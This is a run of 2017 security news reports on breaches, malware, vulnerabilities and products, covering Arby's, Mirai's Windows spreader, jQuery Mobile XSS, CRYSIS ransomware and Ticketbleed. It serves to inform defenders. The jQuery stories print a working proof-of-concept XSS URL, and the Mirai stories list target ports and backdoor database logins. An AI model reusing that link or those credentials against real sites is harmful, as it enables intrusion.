Arby’s told journalist Brian Krebs, who learned about the incident from sources in the financial industry, that it was alerted to the breach in mid-January by industry partners. The company said it had not disclosed the incident to the public at the FBI’s request.
The fast food chain said it immediately brought in Mandiant and other security experts to remove the malware from its systems and investigate the incident. The company is confident that the compromised systems have been cleaned up.
The investigation is ongoing, but the breach appears to have affected Arby’s corporate-owned restaurants and not franchised locations. Of Arby’s more than 3,300 stores in the U.S., over 1,000 are corporate restaurants, but not all of them are impacted.
It is unclear how many payment cards may have been stolen, but Krebs is aware of an alert from PSCU, a credit union service organization with over 800 members, which warned that more than 355,000 credit and debit cards issued by its members were compromised in a breach at a major fast food restaurant chain.
The PSCU alert estimated that the breach occurred between October 25, 2016 and January 19, 2017.
Arby’s is not the only major fast food restaurant chain targeted by cybercriminals. Wendy’s launched an investigation in January 2016 and initially determined that roughly 300 of its restaurants had been hit by a hacker attack that started in 2015.
Wendy’s later determined that the actual number of affected locations exceeded 1,000 and experts believe the incident affected hundreds of thousands of cards.
Cisco Launches "Umbrella" Secure Internet Gateway
10.2.2017 securityweek Safety
Cisco announced this week the launch of Umbrella, a cloud-based Secure Internet Gateway (SIG) solution designed to provide visibility and protection for devices on and outside the corporate network.
Organizations are increasingly relying on software-as-a-service (SaaS) products, such as WebEx, Office 365, Google Docs, Salesforce and Box. While these applications can significantly improve productivity, they are often used over untrusted Internet connections without being protected by a VPN.
Cisco wants to address this problem with the launch of Umbrella. The new cloud service aims to provide safe and secure access from anywhere, even if a VPN is not used.Cisco Umbrella
The networking giant obtained the Umbrella technology when it acquired OpenDNS in 2015. The company said the new product combines the original technology with machine learning models designed for uncovering threats and blocking malicious connections on the DNS and IP layers, Cisco Talos threat intelligence, and Advanced Malware Protection (AMP) technology for detecting and blocking malicious files in the cloud.
With Umbrella, Cisco promises enhanced visibility and control, including for sensitive data in SaaS applications via Cloudlock technology, and intelligence from the more than 100 billion requests resolved every day.
Cisco said the cloud-based SIG provides reliable and fast connectivity, and it can be easily integrated with existing appliances, intelligence platforms and custom tools.
“Umbrella was built upon the OpenDNS platform, a platform that has been delivered from the cloud since its inception. Then we integrated technology from across the Cisco security portfolio, including capabilities from the Cloud Web Security proxy, and the Advanced Malware Protection (AMP) file inspection,” said Brian Roddy, who oversees Cisco’s Cloud Security Business. “These technologies haven’t just been stitched together, but re-engineered to be delivered within Umbrella, so that they’re easy to use and able to deliver even more effective security.”
WordPress Flaw Exploited for Remote Code Execution
10.2.2017 securityweek Exploit
A recently patched WordPress vulnerability has been used to deface roughly 1.5 million web pages and experts have also started seeing attempts to exploit the flaw for remote code execution.
The flaw in question was patched on January 26 with the release of WordPress 4.7.2, but its existence was only disclosed one week later in an effort to give users enough time to update their installations.
The security hole affects the REST API and it has been described as a privilege escalation and content injection vulnerability. It allows attackers to modify the content of any post or page, and it can also be exploited for arbitrary PHP code execution.
Despite WordPress developers giving users a week to update their installations and working with service providers to block exploitation attempts, many websites that don’t have automatic updating enabled are still vulnerable to attacks.
A majority of the attacks spotted so far are part of defacement campaigns conducted by script kiddies looking to boost their online reputation. In the first days after exploits were made public, Sucuri researchers observed four campaigns in which more than 60,000 pages had been defaced.
The number has increased significantly and WordPress security firm WordFence reported on Thursday that it had spotted roughly 1.5 million defaced pages in attacks carried out by 20 different hackers.
WordFence pointed out that none of these hackers had managed to deface too many websites at once before the disclosure of this WordPress vulnerability. Several exploits have been used in the recent attacks and, in some cases, the attackers had found ways to bypass the rules deployed by firewall vendors.
While defacement attacks are not easy to monetize, researchers at Sucuri have started seeing other types of operations involving the REST API flaw.
The vulnerability cannot be directly used for code execution. However, WordPress plugins that allow users to insert PHP code directly into posts can be combined with the flaw to achieve this. Sucuri has seen exploitation attempts against websites that have plugins such as Insert PHP and Exec-PHP, both of which have over 100,000 active installs.
“Defacements don’t offer economic returns, so that will likely die soon,” explained Daniel Cid, founder and CTO of Sucuri. “What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections. We are starting to see them being attempted on a few sites, and that will likely be the direction this vulnerability will be misused in the coming days, weeks and possibly months.”
Arby’s Restaurant Group confirmed a massive card breach hit its stores
10.2.2017 securityaffairs Incindent
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the US, confirmed that its PoS systems had been breached by crooks.
Hundreds of Arby’s Restaurants suffered a card breach, the Arby’s Restaurant Group is the second-largest quick-service fast-food sandwich restaurant chain in the US. Arby’s has more than 3,330 stores in the United States, one-third of those is directly owned by the company.
Brian Krebs first learned about the card breach from its sources in the financial industry, later representatives from the group confirmed him the incident. Arby’s Restaurants discovered the security breach in the mid-January when it was alerted by industry partners.
“Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide.” wrote Brian Krebs
Why was the incident disclosed only now?
According to the company, the card breach was publicly disclosed only now due to an explicit request made by the FBI.
“A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.” continues Krebs.
“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.
“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”
The company hired Mandiant and other security experts to remove sanitize its systems and investigate the card breach. At the time I was writing, the company confirmed that systems have been cleaned up.
“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”
Crooks used a malware to compromise PoS systems at the Arby’s Restaurant Group, it is not clear how many payment cards may have been affected.
According to Krebs, who is aware of an alert from PSCU, more than 355,000 credit and debit cards issued by its members were compromised in a card breach at a major fast food restaurant chain.
The PSCU dated the card breach in the period between October 25, 2016 and January 19, 2017.
On July 2016, another major fast food restaurant chain suffered a card breach, the Wendy’s fast-food chain determined that roughly 1,000 of its restaurants had been breached by cyber criminals.
DDoS útoky se dostaly na své maximu
10.2.2017 SecurityWorld Počítačový útok
DDoS útoky zaznamenaly v posledních třech měsících roku 2016 značný pokrok -- novým trendem jsou ataky spuštěné prostřednictvím velkého počtu botnetů tvořených zranitelnými zařízeními internetu věcí (IoT).
Podle reportu společnosti Kaspersky Lab v průběhu posledního čtvrtletí minulého roku analytici zaznamenali botnetové DDoS útoky v 80 zemích, přičemž v předchozím kvartále jich bylo pouze 67.
Mezi 10 zeměmi, které zaznamenaly nejvíce DDoS obětí, došlo ke změně - Itálie a Nizozemí byly nahrazené Německem a Kanadou. Tři západoevropské země (Nizozemí, Velká Británie a Francie) zůstaly druhý kvartál v řadě mezi top 10 státy s nejvyšším počtem hostitelských C&C serverů, přičemž se k nim v posledním kvartále přidaly Bulharsko a Japonsko.
Nejdéle trvající DDoS útok v posledním čtvrtletí trval 292 hodin (přes 12 dní), což z něj udělalo rekordmana roku 2016. Nejvyšší počet DDoS útoků během jednoho dne se datuje na sobotu 5. listopadu.
Celkově se poslední tři měsíce roku 2016 nesly ve znamení neobvyklých DDoS útoků proti rozmanitým cílům, mezi něž se zařadily společnosti jako Dyn (doménový systém), Deutsche Telekom a některé velké ruské banky.
Tyto společnosti se staly prvními oběťmi nového trendu – DDoS útoky spuštěné prostřednictvím velkého počtu botnetů, které byly tvořeny zranitelnými zařízeními internetu věcí (IoT). Příkladem může být útok Mirai. Přístup, který zvolili tvůrci Mirai, posloužil jako základ mnoha dalším botnetům, které byly utvořeny z infikovaných IoT zařízení.
Narůstající počet útoků, jejichž součástí byly zařízení internetu věcí, byl jen jedním z trendů posledního čtvrtletí. V průběhu celých tří měsíců došlo ke značnému poklesu množství zesílených DDoS útoků, které byly hojně využívané v první polovině loňského roku. Důvodem může být lepší ochrana proti takovýmto útokům a méně zranitelných serverů, na které by mohli kyberzločinci cílit.
Mezeru po zesílených útocích rychle zaplnily útoky prostřednictvím aplikací, mezi něž se zařadily například útoky WordPress Pingback. Detekce útoků skrze aplikace představuje daleko složitější proces, protože útok napodobuje aktivity reálných uživatelů.
Hrozba je o to větší, že tyto útoky čím dál častěji využívají šifrování. To do velké míry zvyšuje efektivitu DDoS útoků, protože se jejich dešifrováním značně komplikuje proces filtrování závadných a pravých požadavků.
Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild
10.2.2017 thehackernews Apple
After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.
The emergence of the first macro-based Word document attack against Apple's macOS platform is the latest example to prove this.
The concept of Macros dates back to 1990s. You might be familiar with the message that reads: "Warning: This document contains macros."
Macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Until now, hackers were cleverly using this technique to target Windows.
However, security researchers have now detected the first in-the-wild instance of hackers are making use of malicious macros in Word documents to install malware on Mac computers and steal your data – an old Windows technique.
The hack tricks victims into opening infected Word documents that subsequently run malicious macros. One such malicious Word file discovered by the researcher was titled "U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace.docm."
However, after clicking on the malicious Word document and before running it on your system, Mac users are always prompted to enable macros.
Denying permission can save you, but if enabled ignoring warnings, the embedded macro executes a function, coded in Python, that downloads the malware payload to infect the Mac PCs, allowing hackers to monitor webcams, access browser history logs, and steal password and encryption keys.
According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre – an open source Mac and Linux post-exploitation agent.
"It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out," said Wardle.
Wardle tracked the IP address from which the malicious Word documents were spread to Russia and that IP has previously been associated with malicious activities like phishing attacks.
adobe flash malware
Another malicious attack discovered by researchers this week also relied on standard Windows techniques by prompting users to download and install a fake software update, but actually harvest the user Keychain, phish usernames and passwords, and other sensitive data.
The MacDownloader nasty virus presented itself as both an update for Adobe Flash and the Bitdefender Adware Removal Tool, which are always annoying and dismissed by most users.
This is what all attackers want. Once the user clicks on either reject the updates or just press yes to dismiss it once and for all, the malware gets the green signal to harvest user keychain, phish usernames and passwords, collect private and sensitive data, and then send them back to attackers.
Researchers have spotted macOS malware targeting mostly the defense industry and reported to have been used against a human rights advocate.
The best way to avoid these kinds of attacks is to just deny permission to enable macros from running when opening a suspicious Word document and avoid downloading software from third-party App Store or untrusted websites.
New Windows Trojan Spreads MIRAI Malware To Hack More IoT Devices
10.2.2017 thehackernews Virus
MIRAI – possibly the biggest IoT-based malware threat that emerged last year, which caused vast internet outage in October last year by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
Now, the infamous malware has updated itself to boost its distribution efforts.
Researchers from Russian cyber-security firm Dr.Web have now uncovered a Windows Trojan designed to built with the sole purpose of helping hackers spread Mirai to even more devices.
Mirai is a malicious software program for Linux-based internet-of-things (IoT) devices which scan for insecure IoT devices, enslaves them into a botnet network, and then used them to launch DDoS attacks, and spreads over Telnet by using factory device credentials.
It all started early October last year when a hacker publicly released the source code of Mirai.
Dubbed Trojan.Mirai.1, the new Trojan targets Windows computers and scans the user's network for compromisable Linux-based connected devices.
Once installed on a Windows computer, the Trojan connects to a command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports such as 22 (SSH) and 23 (Telnet), 135, 445, 1433, 3306 and 3389.
Successful authentication lets malware runs certain commands specified in the configuration file, depending on the type of compromised system.
In the case of Linux systems accessed via Telnet protocol, the Trojan downloads a binary file on the compromised device, which subsequently downloads and launches Linux.Mirai.
"Trojan.Mirai.1's Scanner can check several TCP ports simultaneously. If the Trojan successfully connects to the attacked node via any of the available protocols, it executes the indicated sequence of commands," claimed the company in an advisory published this week.
Once compromised, the Trojan can spread itself to other Windows devices, helping hackers hijack even more devices.
Besides this, researchers noted that the malware could also identify and compromise database services running on various ports, including MySQL and Microsoft SQL to create a new admin “phpminds” with the password a “phpgodwith,” allowing attackers to steal the database.
At this time it’s not known who created this, but the attack design demonstrates that your IoT devices that are not directly accessible from the internet can also get hacked to join the Mirai botnet army.
Every website that uses jQuery Mobile, and has any open redirect is vulnerable to XSS
10.2.2017 seccuritaffairs Mobil
Every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to cross-site scripting (XSS) attacks.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based framework that allows users to design a single responsive web site or application that will work on all popular mobile devices and desktop systems.
According to the foundation, the jQuery Mobile is currently used on more than 150,000 active websites. The Google security engineer Eduardo Vela has discovered that the jQuery Mobile framework can expose websites to cross-site scripting (XSS) attacks in case they are affected also by an open redirect vulnerability.
A few months ago, Vela was searching for CSP bypasses and noticed an interesting behavior of the jQuery Mobile. The jQuery Mobile would fetch any URL in the location.hash and put it in innerHTML, this behavior would be exploited by an attacker under specific conditions. I thought that was pretty weird, so decided to see if it was vulnerable to XSS.
Vela started searching for XSS vulnerability and devised the following attack:
jQuery Mobile checks if you have anything in location.hash.
If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
Then it will just innerHTML the response.
The expert explained that despite the history.pushState should prevent XSS attacks, it is still possible to exploit such kind of flaws if the website is affected by an open redirect vulnerability.
Below the demo provided by Vela:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
According to the expert, there are many websites vulnerable to such attacks because many organizations don’t consider open redirects as security vulnerabilities, such kind of issues are present in major websites such as Google, YouTube, Facebook, Baidu, and Yahoo.
Now the bad news!
Vela reported the flaw to jQuery Mobile development team, but likely it will not be fixed due to the potential impact of a fix on the existing applications. The development team confirmed the risks to their users.
“The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, and not their behavior of fetching and inlining, and that they wouldn’t want to make a change because that might break existing applications. This means that there won’t be a patch as far as I have been informed. The jQuery mobile team suggests to 403 all requests made from XHR that might result in a redirect.” wrote Vela.
“This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.“
Vela is inviting experts to try to exploit the same XSS in the absence of the open redirect vulnerability, he already tested it but without success.
“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn’t work out,” added Vela.
“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs”
CRYSIS Ransomware is back and crooks are using RDP attacks once again
10.2.2017 seccuritaffairs Virus
CRYSIS Ransomware attacks leveraging brute force via Remote Desktop Protocol (RDP) are still ongoing, mostly targeting US firms in the healthcare.
Do you remember the CRYSIS ransomware? It is a ransomware that appeared in the threat landscape last year, now researchers at Trend Micro discovered the CRYSIS ransomware is being distributed via Remote Desktop Protocol (RDP) brute force attacks.
The malware was spread with the same technique in September 2016, when crooks targeted businesses in Australia and New Zealand. Now cyber criminals are targeting organizations across the world.
The researchers at Trend Micro observed a significant increase in the number of CRYSIS ransomware infections in January 2017 compared to the previous months. The last wave of attacks mostly targeted US organizations in the healthcare industry.
“In fact, the volume of these attacks doubled in January 2017 from a comparable period in late 2016. While a wide variety of sectors have been affected, the most consistent target has been the healthcare sector in the United States.” states the blog post published by Trend Micro.
The researchers believe that behind the two campaigns there are the same threat actors.
“We believe that the same group of attackers is behind the earlier attacks and the current campaign. The file names being used are consistent within each region. Other parts of this attack—such as where the malicious files are dropped onto the compromised machine—are also consistent.” continues the report.
The attackers used a folder shared on the remote PC to transfer malware from their machine, and in some cases, they used the clipboard to transfer files.
Both techniques expose the local resources of the attacker to the remote machine, and vice-versa.
The researchers observed multiple login attempts with commonly-used credentials, then when attackers determined the correct username and password usually come back multiple times within a short period trying to infect the endpoint.
“In one particular case, we saw CRYSIS deployed six times (packed different ways) on an endpoint within a span of 10 minutes. When we went over the files that were copied, they were created at various times during a 30-day period starting from the time of the first compromise attempt. The attackers had multiple files at their disposal, and they were experimenting with various payloads until they found something that worked well.” states the report.
These methods, they reveal, exposed the local resources of the attacker to the remote machine, and vice-versa.
Trend Micro suggests organizations apply proper security settings in Remote Desktop Services, for example disabling access to shared drives and the clipboard, making impossible for the attackers to copy malicious payloads via RDP.
The experts also suggest to carefully monitor logs to identify attackers’ IP addresses.
Ticketbleed flaw in F5 Networks BIG-IP appliances exposed to remote attacks
9.2.2017 securityaffairs Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’ that exposes it to remote attacks
The F5 Networks BIG-IP appliances are affected by a serious flaw, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that can be exploited by a remote attacker to extract the content of the memory, including sensitive data (i.e. SSL session IDs).
The list of F5 BIG-IP servers affected by the flaw includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM
The CVE-2016-9244 vulnerability was discovered by the popular security expert Filippo Valsorda and his colleagues at CloudFlare while investigating a bug report from their customer.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” said Valsorda.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory.”
The group reported the issue to F5 in late October, the security firm confirmed the issue affects the BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled.
“A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.” reads the security advisory published by F5.
Ticketbleed reminds use the dangerous Heartbleed flaw in the OpenSSL library, however, unlike Heartbleed, Ticketbleed exposes only 31 bytes of memory instead of 64 kb.
The Ticketbleed is clearly less efficient of the Heartbleed because it requires more rounds to carry on and it affects only F5 products. An Internet scan demonstrated that that hundreds of hosts had been exposed by the flaw.
The company suggests as a workaround to disable the Session Tickets option on the vulnerable Client SSL profile, this is possible accessing to the menu item “Local Traffic > Profiles > SSL > Client ” of the Configuration utility.
The expert Filippo Valsorda has developed a free online tool that could be used to check if a product is affected by the Ticketbleed issue.
Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
ENISA Threat Landscape Report 2016, who is attacking us, and how?
9.2.2017 securityaffairs Attack
ENISA has issued the annual ENISA Threat Landscape Report 2016, a document that synthesizes the emerging trends in cyber security
The European Union Agency for Network and Information Security (ENISA) is an EU Agency composed of security experts that work with these states, public organizations and private groups to develop advice and recommendations on good practice in information security.
I’m very proud to be a member of the group that annually publish an interesting report that summarizes top cyber threats identified during the last 12 months.
The new report, titled ENISA Threat Landscape Report 2016, analyzes the huge number of cyber-incidents that made the headlines in 2016, focusing on threat actors and their TTPs (Tactics, techniques, and procedures).
The document is composed of the following sessions:
“Cyber Threat Intelligence and ETL” provides an overview of recent developments in cyber-threat intelligence positions the ETL and summarizes some cyber-threat intelligence issues that are seen as emerging.
“Top Cyber-Threats,” it provides the results of the yearly threat assessment for the top 15 cyber-threats.
“Threat Agents” is an overview of threat actors.
“Attack Vectors”
“Conclusions” and some policy, business and research recommendations.
“ETL 2016 is streamlined towards the top cyber-threats, providing information on threat agents and attack vectors including all the remarkable developments, trends and issues. Moreover, it reports about threat agents their motivations, and how their practices, tools and techniques have advanced.” read an introduction to the report.
The ENISA Threat Landscape Report 2016 is an impressive source of data and references to the events that characterized the threat landscape in 2016.
The vast majority of the attacks was financially and politically motivated, the year 2016 is thus characterized by “the efficiency of cyber-crime monetization.” Crooks have monetized their effort not only with the illegal activities they conducted but also offering their services through the consolidated model of sale known as “crime-as-a-service.”
Fortunately, we are observing an increasing maturity of defenders when dealing cyber threats and a successful effort of international law enforcement agencies that conducted many operations disrupting criminal organizations.
However, attackers are still one step ahead as explained in the report. The advances of defenders have been the result of the superiority of attackers in:
Abusing unsecured components to mobilize a very large attack potential. This capacity that has been demonstrated by means of DDoS attacks by infected IoT devices.
Successfully launching extortion attacks that have targeted commercial organisations and have achieved very high levels of ransom and high rates of paying victims.
Demonstrating very big impact achieved by multi-layered attacks to affect the outcome of democratic processes at the example of the US elections.
Operating large malicious infrastructures that are managed efficiently and resiliently to withstand takedowns and allow for quick development and multi-tenancy.
Malware remains the principal cyber-threat in 2016, the number of samples reached ca. 600 million per quarter, mobile malware (reaches a growth of ca. 150%) and ransomware have monopolized the threat landscape. Web based attacks and web application attacks follow malware in the Top 15, no change has been observed respecting 2015.
Web based attacks include malicious URLs, compromised domains, browser exploits and drive-by attacks.
“Web based attacks are those that use web components as an attack surface. As web components we understand parts of the web infrastructure, such as web servers, web clients (browsers) content management systems (CMS) and browser extensions” states the report.
The category of web application attacks includes classic techniques like cross-site scripting and SQL-injection (SQLi) that anyway continues to be a privileged attack vector of threat actors. In the fourth place there are the Botnets, these infrastructures are an essential component for a large number of cyber attacks.
The DDoS attacks reached the fourth place, it is the result of extortion activities and the availability in the criminal underground of DDoS-for-hire services that offer to wannabe hackers all the necessary to launch powerful attack.
The report also provides an interesting analysis of top threat actors observed in 2016, Cyber-criminals, insiders, cyber spies, hacktivists, cyber fighters, cyber terrorists and script kiddies operate with different techniques, but in many cases the observed an overlap of their TTPs caused by the evolution of the crime-as-service model.
The ENISA Threat Landscape Report 2016 also associated the various threat to the above threat agents, an interesting exercize that allowed us to better profile the attackers.
Based on the material ENISA’s experts collected, the report provided our conclusions for policy makers, businesses, and research.
“As we speak, the cyber-threat landscape is receiving significant high-level attention: it is on the agenda of politicians in the biggest industrial countries. This is a direct consequence of ‘cyber’ becoming mainstream, in affecting people’s opinions and influencing the political environment of modern societies. Besides this, a lot of developments have taken place regarding the tools and tactics used by adversaries, making 2016 another striking sample of the dynamics of cyber-space. ETL 2016 reflects these developments, while providing strategic information about the cyber-threats and their technical evolution during 2016.” Prof. Udo Helmbrecht, Executive Director of ENISA, commented on the project:
I consider the ENISA Threat Landscape Report 2016 a must reading for the security experts in every industry and executives of any sector, I don’t want tell you more, enjoy it.
The ETL report and related material can be found under the following links:
ETL 2016
Thematic Landscape Hardware
Thematic Landscape Ad-hoc and sensor networking for M2M communications
ENISA Threat Taxonomy
Researchers at Dr Web spotted a Windows version of the Mirai bot
9.2.2017 securityaffairs Virus
Researchers at the antivirus firm Dr.Web discovered a new strain of the Mirai bot, a Windows variant, targeting more ports.
Security experts at the antivirus firm Dr.Web discovered a new strain of the Mirai bot targeting more ports, and it is a Windows version of the popular IoT malware.
The Windows version of the Mirai bot was being used by some criminals to infect IoT devices and carry out DDoS attacks through the spreading of the Mirai Linux malware.
“One of the recent developments on the Mirai malware front was discovered by Russian cyber-security firm Dr.Web, whose experts came across a Windows trojan built with the sole purpose of helping Mirai spread to even more devices” wrote BleepingComputes.com.
The Mirai malware was spotted by the researcher MalwareMustDie in August 2016, it was specifically designed to target IoT devices.
It infected thousands of routers and IoT devices, including DVRs and CCTV system). When the Mirai bot infects a device, it chooses random IPs and attempts to log via the Telnet and SSH port using a list of admin credentials.
Back to the present, the researchers from Dr. Web dubbed the threat Trojan.Mirai.1.
“A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.” states Dr. Web.
“When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports.”
Unlike the original Mirai Linux malware, Trojan.Mirai.1 scans more ports.
“The Trojan can address the following ports:
* 22
* 23
* 135
* 445
* 1433
* 3306
* 3389
When the Trojan.Mirai.1 succeeds infecting a new device, if the device runs the Linux OS, it executes a series of commands, which end up with the creation of a new DDoS Mirai bot. Instead, if the device that has been infected is is running the Windows OS, it releases a copy of itself.
“It also creates DBMS user with login Mssqla and password Bus3456#qwein, grants him sysadmin privileges. Acting under the name of this user and with the help of SQL server event service, various tasks are executed.” continues the analysis.
“The only exception is a connection via RDP protocol: in this case, none of the instructions are executed. Besides that, while connecting to the Linux device via Telnet protocol, it downloads a binary file on the compromised device, and this file subsequently downloads and launches Linux.Mirai.”
Below some Trojan.Mirai.1’s hash in SHA1:
9575d5edb955e8e57d5886e1cf93f54f52912238
f97e8145e1e818f17779a8b136370c24da67a6a5
42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
938715263e1e24f3e3d82d72b4e1d2b60ab187b8
5 Anti-Surveillance tools that can help you enhance online security and privacy
9.2.2017 securityaffairs Safety
The current digital era is filled with all sorts of cyber dangers. The following tools will help you remain safe by enhancing your online security and privacy.
There are many software tools that can help you preserve and protect your privacy online. For your benefit, I’ve compiled a list of the top 5 software tools that can help you protect your online privacy and security.
DuckDuckGo: Privacy Search Engine
DuckDuckgo was launched in 2008 as an alternative search engine that respects user privacy and claims to have a “superior search experience with smarter answers.” It is one of the most popular search engines that provide real privacy and smarter search without tracking user activity.
This search engine doesn’t log or share any personally identifiable information. DuckDuckGo doesn’t use any cookie and it immediately discards IP addresses of users, nor does it keep any record of searches performed.
PureVPN: VPN Software
PureVPN is a highly regarded Hong Kong-based VPN service offering an unusually wide range of software clients for different platforms, which include Windows, Mac, Ubuntu Linux, and mobile apps for Android, iOS and manual configuration for Windows Phone.
PureVPN operates a self-managed VPN network that currently stands at 750+ Servers in 141 countries, which include seldom-covered areas such as Oceania, Africa, and Central America. It provides an extra layer of privacy. It doesn’t collect or log your online activities and doesn’t monitor what you do online. It promises the best online privacy.
PureVPN has a wide variety of security protocols like OpenVPN, IPSec/L2TP, PPTP, SSTP, and IKEv2. It encrypts your entire internet with 256-bit encryption to protect data and online activities.
ProtonMail: Email Encryption Software
ProtonMail is a free and encrypted email client which provides and enhances your email security to keep your data safe. It’s also available on smartphone devices with special apps for Android & iOS. It provides complete email security with end-to-end encryption. Your emails as well as your contacts always stay private.
Cryptocat: Secure Chat software
Cryptocat is one of the most secure chat software for your computer which allows you to chat with your friends in complete privacy. Every message you send via this app is secured with end-to-end encryption, which ensures all of your communications with other Cryptocat users remains protected.
This open source desktop application is available for Windows, OS X and Linux. With this software, you can also share encrypted files, pictures and videos to your buddies safely and easily. Cryptocat users can also receive messages even when they’re offline.
HTTPS Everywhere: Privacy Browser Extension
HTTPS Everywhere is a free extension which is available on Chrome, Firefox and Opera. This extension is developed primarily by the Tor project and Electronic Frontier Foundation (EFF). This extension encrypts your communications with many websites and makes websites use the more secure HTTPS connection instead of HTTP, if they support it.
We hope that the above extensions will help you out in increasing your online privacy and security. If you have any suggestions that you think are worth adding to this list, feel free to let us know.
About Author (Anas Baig):
Anas Baig is a Digital Marketer & Security Enthusiast. He loves to read & write about Digital Security. If you are interested to get tweets about Marketing & Security !
jQuery Mobile Can Expose Websites to XSS Attacks
9.2.2017 securityweek Attack
A Google security engineer discovered that jQuery Mobile can expose websites to cross-site scripting (XSS) attacks if an open redirect vulnerability is also present.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based user interface system designed for developing responsive websites and web applications that can be accessed from any type of device. According to BuiltWith, jQuery Mobile is currently used on more than 150,000 active websites.
Google’s Eduardo Vela discovered a few months ago that jQuery Mobile checks the location.hash, which returns the anchor part of a URL. If there is a URL in the location.hash, it uses the history.pushState method on it and adds it to an XMLHttpRequest object. The response to this request is used with innerHTML.
The use of history.pushState should prevent XSS attacks, but exploitation is still possible if the website is affected by an open redirect vulnerability. An example provided by Vela looks like this:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
There may be many websites vulnerable to such attacks considering that some organizations, including Google, don’t treat open redirects as vulnerabilities. Open redirects can be found on major websites such as Google, YouTube, Facebook, Baidu and Yahoo.
The expert reported his findings to jQuery Mobile developers, but the problem will not be addressed any time soon due to concerns that changing the current behavior could break existing applications. The jQuery team has admitted that developers should be warned about the risks.
“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn't work out,” Vela wrote in a post on his personal blog.
“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs,” the researcher said.
"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks
9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.
The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.
According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.Ticketbleed vulnerability
As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.
